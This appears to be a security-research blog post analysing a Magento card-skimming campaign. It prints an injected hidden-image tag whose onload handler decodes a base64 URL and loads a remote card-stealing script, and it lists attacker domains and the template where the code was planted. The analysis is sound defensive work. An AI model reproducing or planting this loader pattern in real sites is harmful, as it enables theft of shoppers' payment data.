We’ve come across an interesting approach to injecting credit card swipers into Magento web pages.
Instead of injecting a real script, attackers insert a seemingly benign, invisible image from the same site. The catch is, the tag has an “onload” event handler that loads the malicious script.
The injected HTML code looks like this:
<span style="display:none;"><img src="https://www.<redacted>.com/media/wysiwyg/infortis/ultimo/icons/info.png" onload="var o=document.createElement('script');o.src=atob('Ly9jb2xkanMuY29tL2Nk...redacted...2MmZpdw==');var s=document.getElementsByTagName('script');s.parentNode.insertBefore(o, s);"></span>
It is comprised of a tag with the “display:none;” style, which makes the image invisible, and an tag that loads some legitimate image from the compromised site (which makes it look less suspicious). The onload handler creates a new script element with a base64-encoded src parameter (decoded by atob.)
In the above example, the decoded src ( coldjs[.]com/cdn/dnb36346262fiw) is a URL of a credit card stealing script.
The attackers took the time to customize this malware for every compromised site. Not only do they pick real images from the victim’s site but also use different domains for the loaded scripts.
Here are just a few of the domains used by this campaign:
monsterengy[.]com - creation date: 2018-10-12 cosrcmax[.]com - creation date: 2018-10-31 jschef[.]com - creation date: 2019-01-16 googietagmanagar[.]com - creation date: 2019-03-10 cubejs[.]com - creation date: 2019-03-13 coldjs[.]com - creation date: 2019-03-13
The script paths are also individualized. They contain parts of the second-level domain (SLD) names of the victims sites.
/<SLD> /www.<SLD>.com /cdn/<part-of-SLD>36346262fiw /cdn/<SLD>/4879465 /<part-of-SLD>/502osja66ds.js
Given their random nature and occasional typos, we can assume that they are generated manually.
On sites that we cleaned, the malware was injected into the header template of the core_config_data table.